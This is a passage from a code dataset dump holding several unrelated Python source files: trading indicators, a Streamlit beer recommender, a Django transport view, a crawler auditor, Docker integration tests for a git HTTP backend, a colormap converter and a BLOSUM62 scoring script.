\"\"\"\n Calculates (26 period high + 26 period low) / 2\n Also known as the \"Kijun-sen\" line\n \"\"\"\n\n closing_prices = self.utils.get_closing_prices(historical_data)\n period_high = max(closing_prices)\n period_low = min(closing_prices)\n\n return (period_high + period_low) / 2\n\n def get_tenkansen(self, historical_data):\n \"\"\"\n Calculates (9 period high + 9 period low) / 2\n Also known as the \"Tenkan-sen\" line\n \"\"\"\n\n closing_prices = self.utils.get_closing_prices(historical_data)\n period_high = max(closing_prices)\n period_low = min(closing_prices)\n\n return (period_high + period_low) / 2\n\n def get_senkou_span_a(self, kijunsen_data, tenkansen_data):\n \"\"\"\n Calculates (Conversion Line + Base Line) / 2\n Also known as the \"Senkou Span A\" line\n \"\"\"\n\n kijunsen_line = self.get_kijunsen(kijunsen_data)\n tenkansen_line = self.get_tenkansen(tenkansen_data)\n\n return (kijunsen_line + tenkansen_line) / 2\n\n def get_senkou_span_b(self, senkou_span_b_data):\n \"\"\"\n Calculates (52 period high + 52 period low) / 2\n Also known as the \"Senkou Span B\" line\n \"\"\"\n \n closing_prices = self.utils.get_closing_prices(senkou_span_b_data)\n period_high = 
max(closing_prices)\n period_low = min(closing_prices)\n\n return (period_high + period_low) / 2\n","sub_path":"app/strategies/ichimoku_cloud.py","file_name":"ichimoku_cloud.py","file_ext":"py","file_size_in_byte":1810,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"609678328","text":"from data.db_functions import DBFunctions\r\nfrom functions.email_functions import send_mail\r\nfrom data.create_recommender import get_beer_columns, melt_user_item_matrix\r\nimport numpy as np\r\nimport pandas as pd\r\nimport streamlit as st\r\nfrom streamlit.hashing import _CodeHasher\r\nfrom streamlit.report_thread import get_report_ctx\r\nfrom streamlit.server.server import Server\r\nfrom time import sleep\r\nfrom turicreate import load_model, SFrame\r\n\r\n\r\npd.options.mode.chained_assignment = None\r\nst.set_page_config(layout=\"wide\")\r\n\r\n\r\ndef main():\r\n state = _get_state()\r\n pages = {\r\n \"Pesquisa\": display_pesquisa,\r\n \"Recomendações\": display_sugestoes,\r\n }\r\n\r\n st.sidebar.title(\":bookmark_tabs: MENU\")\r\n page = st.sidebar.selectbox(\r\n \"\",\r\n tuple(pages.keys())\r\n )\r\n\r\n # Display the selected page with the session state\r\n pages[page](state)\r\n\r\n # Mandatory to avoid rollbacks with widgets, must be called at the end of your app\r\n state.sync()\r\n\r\n\r\n@st.cache\r\ndef get_beer_list():\r\n db = DBFunctions()\r\n return db.get_df_from_query('beer_list')\r\n\r\n\r\ndef display_pesquisa(state):\r\n st.write('', unsafe_allow_html=True)\r\n st.markdown(\r\n '',\r\n unsafe_allow_html=True\r\n )\r\n st.image('fig/terabeer_banner.jpeg')\r\n\r\n st.markdown('''\r\n ## Olá, que bom que você veio!\r\n \r\n O TeraBeer é um sistema de recomendação de cervejas artesanais brasileiras baseado no seu paladar e no uso \r\n de Inteligência Artificial.\r\n \r\n Antes de mais nada, confirme que você tem mais de 18 anos:\r\n ''')\r\n\r\n if st.checkbox('Sim, tenho mais de 18 anos, internet!', False):\r\n st.text(\"\")\r\n st.markdown(\"![Sei...](https://media.giphy.com/media/VhLc1Mb9HlPo2Jo2ZG/giphy.gif)\")\r\n st.text(\"\")\r\n st.markdown('''\r\n ## :pencil: **PESQUISA**\r\n \r\n Agora responda as duas perguntas a seguir para gerar as suas recomendações.\r\n ''')\r\n\r\n options = ['', 'Gosto', 'Indiferente', 'Não gosto', 'Desconheço']\r\n\r\n st.markdown('''\r\n ### QUAL A SUA OPINIÃO SOBRE OS **ALIMENTOS E BEBIDAS** ABAIXO?\r\n ''')\r\n st.text(\"\")\r\n\r\n taste_questions = { # Key matches column names used in training, value is displayed in forms\r\n 'Alimento Chocolate amargo': 'Chocolate 70% cacau',\r\n 'Alimento Beringela': 'Beringela',\r\n 'Alimento Folhas escuras': 'Folhas escuras',\r\n 'Alimento Mel': 'Mel',\r\n 'Alimento Chocolate ao leite': 'Chocolate ao leite',\r\n 'Alimento Oreo': \"Cookies & Cream\",\r\n 'Alimento Salgadinho': 'Batata chips',\r\n 'Alimento Tomate': 'Tomate',\r\n 'Alimento Margherita': 'Margarita',\r\n 'Alimento Limonada': 'Limonada',\r\n 'Alimento Laranja': 'Laranja',\r\n 'Alimento Maracujá': 'Maracujá',\r\n 'Alimento Tangerina': 'Mexerica/tangerina',\r\n 'Alimento Pimentas': 'Pimenta',\r\n 'Alimento Cravo': 'Cravo',\r\n 'Alimento Banana': 'Banana',\r\n 'Alimento Gengibre': 'Gengibre',\r\n 'Alimento Canela': 'Canela',\r\n 'Alimento Bacon': 'Bacon',\r\n 'Alimento Café': 'Café sem açúcar'\r\n }\r\n\r\n feat_paladar = {}\r\n for feature_name, question in taste_questions.items():\r\n feat_paladar[feature_name] = st.radio(question, options, index=1)\r\n st.text(\"\")\r\n\r\n st.markdown('### 
QUAL A SUA OPINIÃO SOBRE OS SEGUINTES **ESTILOS DE CERVEJA**?')\r\n st.text(\"\")\r\n\r\n beer_questions = {\r\n 'Cerveja Pilsen': 'Pilsen/Lager',\r\n 'Cerveja Blonde': 'Golden Ale/Blonde Ale',\r\n 'Cerveja Trigo': 'Trigo (Weiss)',\r\n 'Cerveja APA': 'American Pale Ale (APA)',\r\n 'Cerveja IPA': 'India Pale Ale (IPA)',\r\n 'Cerveja Session IPA': 'Session IPA',\r\n 'Cerveja NEIPA': 'New England IPA/Juice IPA',\r\n 'Cerveja Porter': 'Porter/Stout',\r\n 'Cerveja Malzbier': 'Dunkel/Malzbier',\r\n 'Cerveja Witbier': 'Witbier',\r\n 'Cerveja Sour': 'Fruit Beer/Sour',\r\n 'Cerveja RIS': 'Russian Imperial Stout/Pastry Stout',\r\n 'Cerveja Lambic': 'Lambic'\r\n }\r\n\r\n for feature_name, question in beer_questions.items():\r\n feat_paladar[feature_name] = st.radio(question, options, index=4)\r\n st.text(\"\")\r\n\r\n st.text(\"\")\r\n exclude_known = st.checkbox('Desejo receber recomendações somente de estilos que eu não conheço', True)\r\n\r\n df_paladar = pd.DataFrame([feat_paladar], index=[-1]) # User-item matrix\r\n preference_map = {\r\n \"Gosto\": 1,\r\n \"Não gosto\": 0,\r\n \"Indiferente\": 0.5,\r\n \"Desconheço\": np.nan\r\n }\r\n df_paladar.replace(preference_map, inplace=True)\r\n melt_df = melt_user_item_matrix(df_paladar)\r\n new_observation_data = melt_df\r\n # st.dataframe(new_observation_data)\r\n\r\n recommendable_beers = get_beer_columns(df_paladar)\r\n recommendable_beers.remove('Cerveja Pilsen')\r\n if not exclude_known: # Exclude beers user doesn't like at all if known beers can be recommended\r\n dislike_beers = melt_df[melt_df['rating'] < 1]['product'].to_list()\r\n for dislike_beer in dislike_beers:\r\n if dislike_beer in recommendable_beers:\r\n recommendable_beers.remove(dislike_beer)\r\n\r\n st.text(\"\")\r\n st.text(\"\")\r\n st.text(\"\")\r\n if st.button('Gerar recomendações'):\r\n model = load_model('data/recommending_system')\r\n if len(recommendable_beers) == 0:\r\n st.error('Não temos nenhuma cerveja para te recomendar :/')\r\n else:\r\n with st.spinner(text='Aguarde um instante enquanto analisamos as suas respostas...'):\r\n sleep(4) # Pretend making recommendations takes a while. Actually they are pretty fast\r\n recommendations = model.recommend(\r\n users=[-1],\r\n k=3,\r\n items=recommendable_beers,\r\n new_observation_data=SFrame(new_observation_data),\r\n exclude_known=exclude_known,\r\n ).to_dataframe()\r\n\r\n # st.dataframe(recommendations)\r\n if recommendations.empty and exclude_known:\r\n st.error('Você conhece muitas cervejas ein?! Que tal desmarcar a caixa acima?')\r\n else:\r\n st.success('Pronto! Selecione no menu à esquerda a página Recomendações.')\r\n sleep(3)\r\n state.recommendations, state.paladar = recommendations, df_paladar\r\n\r\n\r\ndef display_sugestoes(state):\r\n\r\n st.title(':beers: CERVEJAS RECOMENDADAS')\r\n st.markdown('''\r\n Estas são as cervejas artesanais brasileiras **mais recomendadas para você**. 
\r\n Ao final, você poderá enviar a lista de cervejas para o seu e-mail.\r\n ''')\r\n\r\n recommendations, df_paladar = state.recommendations, state.paladar\r\n\r\n # st.dataframe(df_paladar)\r\n # st.dataframe(recommendations)\r\n\r\n if not isinstance(recommendations, pd.DataFrame):\r\n st.error('Sua sessão expirou, responda novamente o formulário para ver as suas recomendações.')\r\n\r\n else:\r\n rename_beer_styles = {\r\n 'Cerveja Blonde': 'Blonde Ale',\r\n 'Cerveja Trigo': 'Weiss (Trigo)',\r\n 'Cerveja APA': 'American Pale Ale',\r\n 'Cerveja IPA': 'India Pale Ale',\r\n 'Cerveja Session IPA': 'Session IPA',\r\n 'Cerveja NEIPA': 'New England IPA',\r\n 'Cerveja Porter': 'Porter/Stout',\r\n 'Cerveja Malzbier': 'Dunkel/Malzbier',\r\n 'Cerveja Witbier': 'Witbier',\r\n 'Cerveja Sour': 'Sour/Fruit',\r\n 'Cerveja RIS': 'Russian Imperial Stout',\r\n 'Cerveja Lambic': 'Lambic'\r\n }\r\n recommendations.replace({'product': rename_beer_styles}, inplace=True)\r\n\r\n with st.spinner('Buscando cervejas...'):\r\n df_cervejas = get_beer_list()\r\n\r\n recommended_labels = pd.merge(recommendations, df_cervejas, left_on='product', right_on='terabeer_style')\r\n recommended_labels.sort_values(by=['score', 'ratings_avg'], ascending=[False, False])\r\n # st.dataframe(recommended_labels)\r\n\r\n origins = recommended_labels['origin_state'].unique().tolist()\r\n origin_filter = st.multiselect(\"Filtrar por estado:\", origins, default=origins)\r\n filtered_labels = recommended_labels[recommended_labels['origin_state'].isin(origin_filter)]\r\n max_beers = st.slider('Número máximo de rótulos por estilo', 1, 5, 3)\r\n\r\n df_style_1 = filtered_labels[filtered_labels['rank'] == 1]\r\n df_style_2 = filtered_labels[filtered_labels['rank'] == 2]\r\n df_style_3 = filtered_labels[filtered_labels['rank'] == 3]\r\n\r\n markdown_list = []\r\n image_list = []\r\n for df_style in [df_style_1, df_style_2, df_style_3]:\r\n if not df_style.empty:\r\n df_style.reset_index(drop=True, inplace=True)\r\n style_name = df_style['terabeer_style'][0]\r\n style_rank = df_style['rank'][0]\r\n style_score = df_style['score'][0]\r\n style_description = df_style['style_description'][0]\r\n style_harmonization = df_style['harmonization'][0]\r\n if style_harmonization:\r\n harmonization_line = f'
Harmoniza bem com: {style_harmonization}'\r\n else:\r\n harmonization_line = ''\r\n\r\n style_markdown = f\"\"\"\r\n
\r\n\r\n\r\n                    Estilo {style_rank}: {style_name} ({style_score:.1%} recomendado para você)\r\n\r\n\r\n\r\n                    Descrição: {style_description} {harmonization_line}\r\n\r\n\r\n
\r\n \"\"\"\r\n st.markdown(style_markdown, unsafe_allow_html=True)\r\n markdown_list.append(style_markdown)\r\n\r\n for index, row in df_style.iloc[0:max_beers, :].iterrows():\r\n beer = row['name']\r\n brewery = row['brand']\r\n abv = row['abv']\r\n ibu = row['ibu']\r\n avg_rating = row['ratings_avg']\r\n count_ratings = int(row['ratings_count'])\r\n figure = row['figure']\r\n ratings_source = row['ratings_source']\r\n ratings_url = row['ratings_url']\r\n origin_state = row['origin_state']\r\n offer_url = row['offer_url']\r\n discount_coupon = row['discount_coupon']\r\n\r\n column1, column2 = st.beta_columns((1, 4))\r\n\r\n with column1: # Column with beer labels\r\n try:\r\n st.image(f'fig/{figure}', use_column_width=True)\r\n image_list.append(f'fig/{figure}')\r\n markdown_list.append(\r\n f\"\"\"\r\n
\r\n\r\n
\r\n \"\"\"\r\n )\r\n\r\n except FileNotFoundError:\r\n st.image('fig/placeholder-image.jpg', use_column_width=True)\r\n image_list.append('fig/placeholder-image.jpg')\r\n markdown_list.append(\r\n f\"\"\"\r\n
\r\n\r\n
\r\n \"\"\"\r\n )\r\n\r\n with column2: # Column with beer characteristics\r\n ratings_source_url = f'{ratings_source}'\r\n ratings_line = f'{avg_rating:.3} ({count_ratings} avaliações no {ratings_source_url})'\r\n ibu_line = f'{int(ibu)} unidades de amargor' if ibu > 0 else 'Indisponível'\r\n discount_phrase = f'(Cupom de desconto: {discount_coupon})' if discount_coupon else ''\r\n offer_line = f'Quero! {discount_phrase}'\r\n beer_markdown = f\"\"\"\r\n
\r\n{beer} - {brewery}\r\n\r\n                                Origem: {origin_state}\r\n                                Nota média: {ratings_line}\r\n                                ABV: {abv}% álcool\r\n                                IBU: {ibu_line}\r\n                                {offer_line}\r\n\r\n
\r\n \"\"\"\r\n st.markdown(beer_markdown, unsafe_allow_html=True)\r\n markdown_list.append(beer_markdown)\r\n\r\n st.text(\"\")\r\n st.text(\"\")\r\n st.markdown(\"### :mailbox: Para receber a lista acima no seu e-mail, digite-o abaixo e aperte enter:\")\r\n email = st.text_input('')\r\n if email:\r\n st.markdown(\"### Qual seu nome?\")\r\n name = st.text_input(' ')\r\n accept_beer_offers = st.checkbox(\r\n 'Aceito receber novidades do TeraBeer.',\r\n True\r\n )\r\n allow_data_usage = st.checkbox(\r\n 'Permito que utilizem minhas respostas para melhorar recomendações futuras.',\r\n True\r\n )\r\n st.text(\"\")\r\n\r\n if st.button('Enviar recomendações por email'):\r\n with st.spinner(text='Enviando...'):\r\n send_mail(email, name, markdown_list, image_list)\r\n\r\n st.success('Enviado! Confira sua caixa de entrada e lixo eletrônico.')\r\n\r\n if accept_beer_offers or allow_data_usage: # Try to send answers to database\r\n db = DBFunctions()\r\n try:\r\n db.send_answers_to_db(\r\n email=email,\r\n name=name,\r\n recommendations=recommendations,\r\n df_paladar=df_paladar,\r\n accept_beer_offers=accept_beer_offers,\r\n allow_data_usage=allow_data_usage,\r\n )\r\n except KeyError:\r\n pass\r\n\r\n\r\nclass _SessionState:\r\n\r\n def __init__(self, session, hash_funcs):\r\n \"\"\"Initialize SessionState instance.\"\"\"\r\n self.__dict__[\"_state\"] = {\r\n \"data\": {},\r\n \"hash\": None,\r\n \"hasher\": _CodeHasher(hash_funcs),\r\n \"is_rerun\": False,\r\n \"session\": session,\r\n }\r\n\r\n def __call__(self, **kwargs):\r\n \"\"\"Initialize state data once.\"\"\"\r\n for item, value in kwargs.items():\r\n if item not in self._state[\"data\"]:\r\n self._state[\"data\"][item] = value\r\n\r\n def __getitem__(self, item):\r\n \"\"\"Return a saved state value, None if item is undefined.\"\"\"\r\n return self._state[\"data\"].get(item, None)\r\n\r\n def __getattr__(self, item):\r\n \"\"\"Return a saved state value, None if item is undefined.\"\"\"\r\n return self._state[\"data\"].get(item, None)\r\n\r\n def __setitem__(self, item, value):\r\n \"\"\"Set state value.\"\"\"\r\n self._state[\"data\"][item] = value\r\n\r\n def __setattr__(self, item, value):\r\n \"\"\"Set state value.\"\"\"\r\n self._state[\"data\"][item] = value\r\n\r\n def clear(self):\r\n \"\"\"Clear session state and request a rerun.\"\"\"\r\n self._state[\"data\"].clear()\r\n self._state[\"session\"].request_rerun()\r\n\r\n def sync(self):\r\n \"\"\"Rerun the app with all state values up to date from the beginning to fix rollbacks.\"\"\"\r\n\r\n # Ensure to rerun only once to avoid infinite loops\r\n # caused by a constantly changing state value at each run.\r\n #\r\n # Example: state.value += 1\r\n if self._state[\"is_rerun\"]:\r\n self._state[\"is_rerun\"] = False\r\n\r\n elif self._state[\"hash\"] is not None:\r\n if self._state[\"hash\"] != self._state[\"hasher\"].to_bytes(self._state[\"data\"], None):\r\n self._state[\"is_rerun\"] = True\r\n self._state[\"session\"].request_rerun()\r\n\r\n self._state[\"hash\"] = self._state[\"hasher\"].to_bytes(self._state[\"data\"], None)\r\n\r\n\r\ndef _get_session():\r\n session_id = get_report_ctx().session_id\r\n session_info = Server.get_current()._get_session_info(session_id)\r\n\r\n if session_info is None:\r\n raise RuntimeError(\"Couldn't get your Streamlit Session object.\")\r\n\r\n return session_info.session\r\n\r\n\r\ndef _get_state(hash_funcs=None):\r\n session = _get_session()\r\n\r\n if not hasattr(session, \"_custom_session_state\"):\r\n session._custom_session_state = 
_SessionState(session, hash_funcs)\r\n\r\n return session._custom_session_state\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":18213,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"340079760","text":"from django.contrib.gis.geos import Point\nfrom django.utils.translation import ugettext as _\n\nfrom molly.conf import app_by_application_name\n\nfrom molly.utils.views import BaseView\nfrom molly.utils.breadcrumbs import *\nfrom molly.favourites import get_favourites\n\nfrom molly.apps.places import get_entity\nfrom molly.apps.places.models import Entity, EntityType\n\nclass IndexView(BaseView):\n @BreadcrumbFactory\n def breadcrumb(self, request, context):\n return Breadcrumb(\n self.conf.local_name,\n None,\n _('Transport'),\n lazy_reverse('%s:index' % self.conf.local_name),\n )\n \n def initial_context(self, request):\n \n # Get our location for location sorting\n location = request.session.get('geolocation:location')\n if location:\n location = Point(location, srid=4326)\n \n context, entities = {'location':location}, set()\n \n # If train station is set on config, then include that\n if hasattr(self.conf, 'train_station'):\n if getattr(self.conf, 'train_station_nearest', False) and location:\n et = EntityType.objects.get(slug='rail-station')\n entity = et.entities_completion.filter(location__isnull=False).distance(location).order_by('distance')[0]\n else:\n scheme, value = self.conf.train_station.split(':')\n entity = get_entity(scheme, value)\n entities.add(entity)\n context['train_station'] = entity\n \n # If park and ride variable is set, then include those too:\n if hasattr(self.conf, 'park_and_rides'):\n park_and_rides = []\n for park_and_ride in self.conf.park_and_rides:\n scheme, value = park_and_ride.split(':')\n entity = get_entity(scheme, value)\n park_and_rides.append(entity)\n entities.add(entity)\n context['park_and_rides'] = park_and_rides\n \n # If service status provider is set, then include those too:\n if hasattr(self.conf, 'transit_status_provider'):\n context['transit_status'] = self.conf.transit_status_provider.get_status()\n \n context['nearby'] = {}\n for context_key in getattr(self.conf, 'nearby', {}):\n type_slug, count = self.conf.nearby[context_key]\n et = EntityType.objects.get(slug=type_slug)\n \n favourites = filter(\n lambda e: e is not None and et in e.all_types_completion.all(),\n [f.metadata.get('entity') for f in get_favourites(request)])\n \n if request.GET.get(context_key) == 'nearby':\n \n if location:\n es = et.entities_completion.filter(location__isnull=False).distance(location).order_by('distance')[:count]\n else:\n es = []\n results_type = 'Nearby'\n \n elif request.GET.get(context_key) == 'favourites':\n \n es = favourites \n results_type = 'Favourite'\n \n else:\n \n if len(favourites) == 0:\n if location:\n es = et.entities_completion.filter(location__isnull=False).distance(location).order_by('distance')[:count]\n else:\n es = []\n else:\n es = favourites\n \n results_type = 'Favourite' if len(favourites) > 0 else 'Nearby'\n \n for e in (e for e in es if hasattr(e, 'distance')):\n distance, e.bearing = e.get_distance_and_bearing_from(location)\n \n entities |= set(es)\n context['nearby'][context_key] = {\n 'type': et,\n 'entities': es,\n 'results_type': results_type,\n }\n \n if getattr(self.conf, 'travel_alerts', False):\n es = Entity.objects.filter(primary_type__slug='travel-alert')\n if location:\n 
es = es.filter(location__isnull=False).distance(location).order_by('distance')\n else:\n es = es.order_by('title')\n entities |= set(es)\n context['travel_alerts'] = es\n \n # Get any real-time information for all the places we're about to display\n places_conf = app_by_application_name('molly.apps.places')\n for provider in reversed(places_conf.providers):\n provider.augment_metadata(entities,\n board=request.GET.get('board', 'departures'))\n \n context['board'] = request.GET.get('board', 'departures')\n return context\n \n def handle_GET(self, request, context):\n return self.render(request, context, 'transport/index')","sub_path":"molly/apps/transport/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4946,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"51809934","text":"#coding=utf-8\r\nfrom p_common.p_db import m_db_func\r\nfrom p_common.p_cache import m_cache_factory\r\nfrom p_common.p_uuid import m_uuid\r\nimport m_audit_func\r\n\r\nclass Audit(object):\r\n def __init__(self):\r\n self.auditCount = 0 #用于前端显示\r\n self.db = m_db_func.DB_Func()#建立一个数据库连接\r\n self.db.Connect()\r\n self.optimization = \"set unique_checks=0\"\r\n self.db.ExecuteCommitSql(self.optimization)\r\n self.func = m_audit_func.Audit_func(self.db)\r\n \r\n def Start(self):\r\n while True:\r\n goodInfo = m_cache_factory.GetInstance('dd').Read()\r\n goodInfo.BeautifyMyself()\r\n self.DealFunc(goodInfo)\r\n self.auditCount += 1\r\n \r\n def DealFunc(self, goodInfo):\r\n dbItem = self.func.SelectGoods(goodInfo.goodsId, goodInfo.websiteName)\r\n if dbItem:\r\n if not self.func.ComparePrice(dbItem, goodInfo.goodsPrice):\r\n self.func.UpdateGood(dbItem[0], goodInfo)\r\n self.func.InsertPrice(dbItem[0],goodInfo.goodsPrice)\r\n else:\r\n if self.func.CompareGood(dbItem, goodInfo):\r\n self.func.UpdateGood(dbItem[0], goodInfo)\r\n else:\r\n uniqueId = m_uuid.getUuid()\r\n self.func.InsertGood(uniqueId,goodInfo)\r\n self.func.InsertPrice(uniqueId, goodInfo.goodsPrice)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"CrawlFramework/p_engine/p_auditData/m_audit.py","file_name":"m_audit.py","file_ext":"py","file_size_in_byte":1432,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"272199375","text":"# pylint: disable=W0613\n\n# Copyright (C) 2018 The Android Open Source Project\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom pathlib import Path\n\nimport os.path\n\nimport git\nimport pytest\nimport requests\n\n\n@pytest.fixture(scope=\"function\")\ndef repo_dir(tmp_path_factory, random_repo_name):\n return tmp_path_factory.mktemp(random_repo_name)\n\n\n@pytest.fixture(scope=\"function\")\ndef mock_repo(repo_dir):\n repo = git.Repo.init(repo_dir)\n file_name = os.path.join(repo_dir, \"test.txt\")\n Path(file_name).touch()\n repo.index.add([file_name])\n repo.index.commit(\"initial commit\")\n return repo\n\n\n@pytest.mark.docker\n@pytest.mark.integration\ndef 
test_apache_git_http_backend_apache_running(container_run, base_url):\n request = requests.get(base_url)\n assert request.status_code == 200\n\n\n@pytest.mark.docker\n@pytest.mark.integration\ndef test_apache_git_http_backend_repo_creation(\n container_run, basic_auth_creds, repo_creation_url\n):\n request = requests.get(\n repo_creation_url,\n auth=requests.auth.HTTPBasicAuth(\n basic_auth_creds[\"user\"], basic_auth_creds[\"password\"]\n ),\n )\n assert request.status_code == 201\n\n\n@pytest.mark.docker\n@pytest.mark.integration\ndef test_apache_git_http_backend_repo_creation_fails_without_credentials(\n container_run, repo_creation_url\n):\n request = requests.get(repo_creation_url)\n assert request.status_code == 401\n\n\n@pytest.mark.docker\n@pytest.mark.integration\ndef test_apache_git_http_backend_repo_creation_fails_wrong_fs_permissions(\n container_run, basic_auth_creds, repo_creation_url\n):\n container_run.exec_run(\"chown -R root:root /var/gerrit/git\")\n request = requests.get(\n repo_creation_url,\n auth=requests.auth.HTTPBasicAuth(\n basic_auth_creds[\"user\"], basic_auth_creds[\"password\"]\n ),\n )\n container_run.exec_run(\"chown -R gerrit:users /var/gerrit/git\")\n assert request.status_code == 500\n\n\n@pytest.mark.docker\n@pytest.mark.integration\ndef test_apache_git_http_backend_repo_creation_push_repo(\n container_run, base_url, basic_auth_creds, mock_repo, random_repo_name\n):\n container_run.exec_run(\n \"su -c 'git init --bare /var/gerrit/git/%s.git' gerrit\" % random_repo_name\n )\n url = \"%s/git/%s.git\" % (base_url, random_repo_name)\n url = url.replace(\n \"//\", \"//%s:%s@\" % (basic_auth_creds[\"user\"], basic_auth_creds[\"password\"])\n )\n origin = mock_repo.create_remote(\"origin\", url)\n assert origin.exists()\n\n origin.fetch()\n result = origin.push(refspec=\"master:master\")\n assert result\n\n remote_refs = {}\n git_cmd = git.cmd.Git()\n for ref in git_cmd.ls_remote(url).split(\"\\n\"):\n hash_ref_list = ref.split(\"\\t\")\n remote_refs[hash_ref_list[1]] = hash_ref_list[0]\n assert remote_refs[\"HEAD\"] == mock_repo.head.object.hexsha\n","sub_path":"tests/container-images/apache-git-http-backend/test_container_integration_apache_git_http_backend.py","file_name":"test_container_integration_apache_git_http_backend.py","file_ext":"py","file_size_in_byte":3349,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"367182327","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Jul 25 16:28:28 2014\n\n@author: jake\n\"\"\"\n\n#from scipy.io import read_array\n#from scipy import zeros, linspace, shape, Float, concatenate\nfrom numpy import *\nimport pickle\n\n# Credit for this function goes to:\n# http://matplotlib.1069221.n5.nabble.com/function-to-create-a-colormap-from-cpt-palette-td2165.html\ndef cpt2seg(file_name, sym=False, discrete=False):\n \"\"\"Reads a .cpt palette and returns a segmented colormap.\n\n sym : If True, the returned colormap contains the palette and a mirrored copy.\n For example, a blue-red-green palette would return a blue-red-green-green-red-blue colormap.\n\n discrete : If true, the returned colormap has a fixed number of uniform colors.\n That is, colors are not interpolated to form a continuous range.\n\n Example :\n >>> _palette_data = cpt2seg('palette.cpt')\n >>> palette = matplotlib.colors.LinearSegmentedColormap('palette', _palette_data, 100)\n >>> imshow(X, cmap=palette)\n \"\"\"\n \n \n dic = {}\n f = open(file_name, 'r')\n rgb = loadtxt(f)\n \n rgb = rgb/255.\n s = 
shape(rgb)\n colors = ['red', 'green', 'blue']\n for c in colors:\n i = colors.index(c)\n x = rgb[:, i+1]\n\n if discrete:\n if sym:\n dic[c] = zeros((2*s[0]+1, 3), dtype='f')\n dic[c][:,0] = linspace(0,1,2*s[0]+1)\n vec = concatenate((x ,x[::-1]))\n else:\n dic[c] = zeros((s[0]+1, 3), dtype='f')\n dic[c][:,0] = linspace(0,1,s[0]+1)\n vec = x\n dic[c][1:, 1] = vec\n dic[c][:-1,2] = vec\n \n else:\n if sym:\n dic[c] = zeros((2*s[0], 3), dtype='f')\n dic[c][:,0] = linspace(0,1,2*s[0])\n vec = concatenate((x ,x[::-1]))\n else:\n dic[c] = zeros((s[0], 3), dtype='f')\n dic[c][:,0] = linspace(0,1,s[0])\n vec = x\n dic[c][:, 1] = vec\n dic[c][:, 2] = vec\n \n return dic\n\ncm = cpt2seg('wiki.cpt', discrete = True)\n\nprint(cm)\n# Save the color map dictionary\npickle.dump( cm, open( \"wiki.p\", \"wb\" ) )\n\n","sub_path":"plot/color_maps/cpt_convert.py","file_name":"cpt_convert.py","file_ext":"py","file_size_in_byte":2187,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"341927892","text":"# -*- coding: utf-8 -*-\n# @Time : 2019/7/9\n# @Author : CHEN Li and ZENG Yanru\n# @Email : 595438103@qq.com\n# @File : KNNBinding.py\n# @Software: PyCharm\nfrom multiprocessing.dummy import Pool as ThreadPool\nfrom multiprocessing import Pool\nimport numpy as np\n\nblosum62_matrix = {}\n# file=open(r\"/root/DeepSUMO/src/libdata/blosum62.txt\",\"r\")\nfile = open(r\"libdata/blosum62.txt\",\"r\")\n# file = open(\"/data/zengyanru/DeepSumo/PretreatData/Result/blosum62.txt\", \"r\")\nfile = file.readlines()\nheader_l = file[0].strip().split(\"\\t\")\n# print(header_l)\nfor i in range(len(file) - 1):\n i += 1\n li = file[i].strip().split(\"\\t\")\n for j in range(len(header_l)):\n key1 = li[0] + header_l[j]\n blosum62_matrix[key1] = li[j + 1]\n\n\ndef blosum62(_list1, _list2):\n score_def = 0\n for i in range(len(_list1)):\n score_def += int(blosum62_matrix[str(_list1[i]) + str(_list2[i])])\n return score_def\n\n\ndef get_rate(_line, _positive_line, _negative_line, avg2):\n positive_score_list = []\n negative_score_list = []\n if _line + \"\\n\" in _positive_line:\n _positive_line.remove(_line + \"\\n\")\n elif _line + \"\\n\" in _negative_line:\n _negative_line.remove(_line + \"\\n\")\n # print(negative_score_list)\n else:\n pass\n for positive_line in _positive_line:\n positive_line = positive_line.strip()[30 - int(avg2):37 + int(avg2)]\n score = blosum62(_line, positive_line)\n score1 = [score, \"pos\"]\n positive_score_list.append(score1)\n # if str(line) in positive_scores_dict:\n # positive_scores_dict[str(_line)].update({'positive_score_list':positive_score_list})\n # else:\n # positive_scores_dict.update({str(line):{'positive_score_list':positive_score_list}})\n for negative_line in _negative_line:\n negative_line = negative_line.strip()[30 - int(avg2):37 + int(avg2)]\n score = blosum62(_line, negative_line)\n score1 = [score, \"neg\"]\n negative_score_list.append(score1)\n # if str(line) in positive_scores_dict:\n # positive_scores_dict[str(line)].update({'negative_score_list':negative_score_list})\n # else:\n # positive_scores_dict.update({str(line):{'negative_score_list':negative_score_list}})\n\n # 1.1 topk rate\n positive_rate_list = []\n for i in range(30): #\n p = (i + 1) / 100 # used to be i/100, but it will lead to zero division if the sample size is less than 100!\n np_sum = int(len(_positive_line) * p)\n if np_sum == 0:\n np_sum = 1\n # np_sum = np.ceil(len(_positive_line) * p) # in case number of positive seq less than 100\n\n # 
